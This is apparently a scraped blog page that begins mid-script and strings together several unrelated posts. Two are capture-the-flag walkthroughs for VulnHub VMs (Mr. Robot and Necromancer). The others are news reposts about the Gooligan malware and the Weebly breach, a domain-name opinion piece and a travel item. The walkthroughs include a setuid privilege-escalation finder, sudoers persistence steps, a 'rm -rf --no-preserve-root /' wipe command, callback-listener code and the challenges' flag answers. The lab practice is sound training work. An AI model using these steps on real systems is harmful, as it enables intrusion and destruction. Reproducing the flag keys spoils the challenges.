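PRUNE = ("/proc", "/sys", "/dev", "/run")   # pseudo filesystems: noise, never setuid binaries


def is_setuid(path: str, require_root: bool = True) -> bool:
    """True for a regular file with the setuid bit; by default only if owned by root,
    since setuid to an unprivileged user is rarely useful for escalation."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    if not stat.S_ISREG(st.st_mode) or not (st.st_mode & stat.S_ISUID):
        return False
    return st.st_uid == 0 or not require_root


def find_setuid(roots: Iterable[str], require_root: bool = True) -> List[str]:
    """Python equivalent of `find / -perm -4000 -type f`, skipping pseudo filesystems
    and directories we are not allowed to read."""
    hits = []
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
            dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PRUNE]
            for name in filenames:
                path = os.path.join(dirpath, name)
                if is_setuid(path, require_root):
                    hits.append(path)
    return sorted(hits)


def escalation_candidates(paths: Iterable[str]) -> List[str]:
    """Filter the setuid list down to binaries known to hand out a shell."""
    return [p for p in paths if os.path.basename(p) in SHELL_CAPABLE]


def demo() -> Tuple[List[str], List[str]]:
    """Constructed sandbox: a setuid 'nmap' beside a normal 'ls'. require_root=False
    because the files belong to whoever runs this, not to root."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "bin")
    os.mkdir(bindir)
    for name, mode in (("nmap", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    hits = find_setuid([root], require_root=False)
    return ([os.path.basename(h) for h in hits],
            [os.path.basename(h) for h in escalation_candidates(hits)])


if __name__ == "__main__":
    found = find_setuid(["/"])
    print("\n".join(found))
    print("worth a look:", escalation_candidates(found))
```

On a real host the interesting output is the second list: passwd, su and sudo are expected to be setuid; an nmap, vim or find in that list is the box's misconfiguration, and the fix is chmod u-s.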
What's next after getting root access? I'm not done yet: my user "robot" is still a standard account. I can make the escalation permanent by giving "robot" sudo rights, adding "robot ALL=(ALL) ALL" to the sudoers file. From the !sh root shell, type nano /etc/sudoers and add that line. Caveat: editing /etc/sudoers directly with nano is risky, because a syntax error locks everyone out of sudo; use visudo instead, or drop the line into its own file under /etc/sudoers.d/ with mode 0440 and check it with visudo -c.
Save it. Exit the !sh shell, quit nmap, run sudo ls and enter the robot password. If everything goes well, I can run sudo su for a superuser shell.
Rooted!
From here I can do anything to the Mr. Robot virtual machine. I could even wipe the box with "rm -rf --no-preserve-root /" (on a disposable VM only, obviously).
I still need to find the value of key-1-of-3.txt. Going back to the website, check other sub-folders.
Checking the http://192.168.159.130/robots/ page got nothing.
Checking the http://192.168.159.130/robots.txt file shows interesting information: fsocity.dic and key-1-of-3.txt. Let's download these files and investigate.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
run wget http://192.168.159.130/fsocity.dic
root@kali:~/KING.NET/mr.robot# wget http://192.168.159.130/fsocity.dic
--2016-12-03 15:13:04-- http://192.168.159.130/fsocity.dic
Connecting to 192.168.159.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[=======================>] 6.91M 20.0MB/s in 0.3s
2016-12-03 15:13:06 (20.0 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]
fsocity.dic is 6.91 MB; it could be a word list.
Let me download the text file too.
root@kali:~/KING.NET/mr.robot# wget http://192.168.159.130/key-1-of-3.txt
--2016-12-03 15:14:47-- http://192.168.159.130/key-1-of-3.txt
Connecting to 192.168.159.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33 [text/plain]
Saving to: ‘key-1-of-3.txt’
key-1-of-3.txt 100%[=======================>] 33 --.-KB/s in 0s
2016-12-03 15:14:47 (4.97 MB/s) - ‘key-1-of-3.txt’ saved [33/33]
The key-1-of-3.txt file is only 33 bytes, very small: a 32-character hex string plus a newline.
I ran cat fsocity.dic to check the content and confirmed it is a dictionary file. Running cat key-1-of-3.txt gives this result.
root@kali:~/KING.NET/mr.robot# cat key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
Found it. key-1-of-3.txt value is "073403c8a58a1f80d943455fb30724b9"
So all keys discovered!
  1. key-1-of-3.txt "073403c8a58a1f80d943455fb30724b9"
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".

That's fun ...
Thank you for reading my walkthrough. I will create a follow-up video later this week.
And I'm still catching up on all the challenges provided by the Vulnhub.com website.
Thank you,

Gooligan Android malware breached 1Million users

FYI Android users: you have to read this article, courtesy of HelpNetSecurity.com, if you use an Android smartphone. I actually read it first on the CNN website and again today.
Check Point security researchers have revealed a new variant of Android malware, breaching the security of more than one million Google accounts.

Key findings

  • The campaign infects 13,000 devices each day and is the first to root over a million devices.
  • Hundreds of email addresses are associated with enterprise accounts worldwide.
  • Gooligan targets devices on Android 4 (Jelly Bean, KitKat) and 5 (Lollipop), which represent nearly 74% of Android devices in use today.
  • After attackers gain control over the device, they generate revenue by fraudulently installing apps from Google Play and rating them on behalf of the victim.
  • Every day Gooligan installs at least 30,000 apps on breached devices, or over 2 million apps since the campaign began.
Check Point reached out to the Google security team immediately with information on this campaign. “As part of our ongoing efforts to protect users from the Ghost Push family of malware, we’ve taken numerous steps to protect our users and improve the security of the Android ecosystem overall,” stated Adrian Ludwig, Google’s director of Android security.
continue reading at Que.com website.
Sponsored by Retune.com

CTF – Hacking Necromancer

Capture The Flag: Necromancer. Practicing my penetration testing skills by hacking a target machine. Here's my test environment in my own private virtual network.
I set up my Kali Linux in a host-only virtual network together with my target machine (Necromancer), an OVA image I downloaded from the VulnHub website.
When I started my Kali Linux virtual machine it was assigned IP address 192.168.231.129. This will most likely be a different IP address when you set up your own private network. My target machine Necromancer has IP address 192.168.231.128; I saw this when I started the Necromancer virtual machine, which saved me some time scanning the whole /24.
Anyway, if you still want to scan your network you can use the "netdiscover" tool. If you're not sure which options to use, run "netdiscover --help". Okay, got it? Now run # netdiscover -r 192.168.231.0/24 [Enter] to scan your private network. Here's the result for my network. I ran "ifconfig" on Kali to know its assigned IP address; the other IP is most likely my target.
192.168.231.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.231.128 00:0c:29:a5:8c:67 1 60 VMware, Inc.
192.168.231.129 00:50:56:f0:0a:96 1 60 VMware, Inc.
With this information I can simply run nmap to my target IP address.
Note: IP Address renewal in 900 seconds.
Now my private network, Kali and target machine are ready. Let's begin hacking my target machine.
From the Kali Linux virtual machine run # nmap 192.168.231.128 to see what I can discover.
I found port 80 open and 1 host up. That's a good start. A plain TCP scan says nothing about UDP services, so let's also run # nmap -sU -n -r -T4 192.168.231.128
Now it's getting interesting. I found UDP port 666, which nmap labels as the doom service (a guess from its port-number table, not a fingerprint of what is actually listening).
Let's fire up netcat in UDP mode against the newly discovered port: # nc -u 192.168.231.128 666 [Enter].
Hmm. Nothing happened. I wonder what's going on in the background. One way to find out: run our network sniffing tool, Wireshark. Filtering on my target machine's IP address 192.168.231.128, I found it is trying to connect back to me on destination port 4444.
I open another terminal window and set up a listener on port 4444: # nc -lvp 4444 [Enter]. Then re-run # nc -u 192.168.231.128 666 [Enter] and wait for the output in the listening terminal window.
This is the result.
My first guess is that it is base64. I copied the blob into my dumptext.txt file and ran # base64 -d -i dumptext.txt [Enter].
Woohh. I got the first flag.
I copied flag1{e6078b9b1aac915d11b9fd59791030bf} to my flags.txt file for the record, just like a trophy :)
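The exchange above is a small protocol: a datagram to UDP 666 makes the box connect back to the sender on TCP 4444 and hand over a base64 blob. The following is an added example, not from the walkthrough or from the Necromancer VM: both sides on loopback in Python, with a constructed stand-in target that embeds the flag1 value from this post, and the attacker side doing things in the order that matters (listen first, then poke). Ports are picked by the OS rather than hard-coded to 666 and 4444.

```python
import base64
import re
import socket
import threading
from typing import Optional

FLAG_RE = re.compile(rb"flag\d*\{[0-9a-f]{32}\}")


def free_port(kind: int) -> int:
    """Ask the OS for an unused loopback port (the walkthrough used fixed 666 and 4444)."""
    with socket.socket(socket.AF_INET, kind) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def start_fake_target(udp_port: int, callback_port: int, secret: bytes) -> threading.Thread:
    """Constructed stand-in for the Necromancer box. The UDP socket is bound here, before
    the thread starts, so the attacker's datagram cannot arrive too early and be lost."""
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.bind(("127.0.0.1", udp_port))
    udp.settimeout(5)

    def serve() -> None:
        try:
            _, (peer_host, _) = udp.recvfrom(1024)   # any datagram triggers the callback
            with socket.create_connection((peer_host, callback_port), timeout=5) as back:
                back.sendall(base64.b64encode(secret) + b"\n")
        finally:
            udp.close()

    worker = threading.Thread(target=serve, daemon=True)
    worker.start()
    return worker


def poke_and_catch(target_host: str, udp_port: int, callback_port: int,
                   timeout: float = 5.0) -> bytes:
    """Attacker side, in the order that matters: listen first (nc -lvp 4444), then send
    the UDP datagram (nc -u target 666), then read whatever connects back."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind(("0.0.0.0", callback_port))
        listener.listen(1)
        listener.settimeout(timeout)
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udp:
            udp.sendto(b"hello\n", (target_host, udp_port))
        conn, _ = listener.accept()
        with conn:
            conn.settimeout(timeout)
            chunks = []
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                chunks.append(data)
    return b"".join(chunks)


def decode_callback(raw: bytes) -> bytes:
    """The callback carries base64, possibly line-wrapped and without padding."""
    compact = b"".join(raw.split())
    compact += b"=" * (-len(compact) % 4)
    return base64.b64decode(compact)


def find_flag(data: bytes) -> Optional[str]:
    match = FLAG_RE.search(data)
    return match.group(0).decode() if match else None


def demo() -> Optional[str]:
    """Run both sides on loopback. The secret is a constructed message wrapping the
    flag1 value from this post."""
    secret = b"Welcome to the Necromancer. flag1{e6078b9b1aac915d11b9fd59791030bf}\n"
    udp_port = free_port(socket.SOCK_DGRAM)
    callback_port = free_port(socket.SOCK_STREAM)
    start_fake_target(udp_port, callback_port, secret)
    raw = poke_and_catch("127.0.0.1", udp_port, callback_port)
    return find_flag(decode_callback(raw))


if __name__ == "__main__":
    print(demo())
```

The ordering is the lesson from the Wireshark detour: the first nc attempt got nothing because nothing was listening on 4444 when the box called back. A sniffer on the attacker side is the general way to learn where a target is trying to reach you.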
Thank you.

Weebly Breach Affects Over 43 Million Users

Hackers have managed to steal information associated with more than 43 million accounts belonging to customers of Weebly, a San Francisco-based web hosting service that provides a drag-and-drop website builder.
According to LeakedSource, the attackers stole 43,430,316 accounts after breaching the company’s systems in February. The compromised information includes usernames, email addresses, IPs and password hashes.
Weebly has been in touch with LeakedSource and confirmed that the exposed information is genuine. The company has notified affected users and reset their passwords. On its website, Weebly claims to have more than 40 million users, which indicates that the breach has affected a large majority, if not all, of its customers.
Sponsored by: LibertyTrust.com
Weebly is still trying to determine the cause of the breach, but the company says it has already started improving network security. In addition to resetting passwords, it has introduced a new feature that allows users to monitor their most recent login history for unauthorized access.
There is no evidence that Weebly users’ customers are affected and the hosting service says it does not store full credit card numbers or other financial information. Users have been warned about the risks of password reuse and the possibility that cybercriminals could leverage this incident for phishing campaigns.
Continue reading: QUE.COM Cyber Security News

The silent evolution of domain names

An interesting article posted at TechCrunch regarding the new gTLDs: you can now register a domain name under one of 1000+ different extensions, from .GURU and .NINJA to almost anything you can think of.
In my humble opinion, the new gTLDs are good for a personal blog or website, but I would not recommend one for business use as your primary site for online e-commerce. Why build your online business on anything.extension and give free advertising to the owner of the .com domain, after you worked hard to establish your online brand, spending time and money spreading the word about your business to everyone you know?
People know that .com is the trusted place to conduct business, plain and simple. This is also the reason I rebranded from KING.NET to QUE.COM; yes, it was not an easy task and not cheap either. This is why I always recommend to my clients: do it right the first time and get your business a .com domain name.
I will register other extensions to support my business, redirect them to my primary site, and use them for marketing purposes only, but never as the primary website. I hope that makes sense.
Go get your new gTLDs extensions at Moscom.com or NeedName.com.
Source: MAJ.COM

Mangrove Paddle Boat Tour in Puerto Princesa

If you are in Puerto Princesa, you've got to visit Mangrove Paddle Boat Tour.
Mangroves are very important in supporting the rich marine life in the region where smaller fishes feed and reproduce. The Mangrove Paddle Boat tour offers an educational tour by boat through Sabang's Mangrove forests.
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
Our friendly boat guide Ms. Chi
And our hard working boat man "Ronchi".
Photos courtesy by EMIL@QUE.COM for PuertoPrincesa.com, check it out for more photos.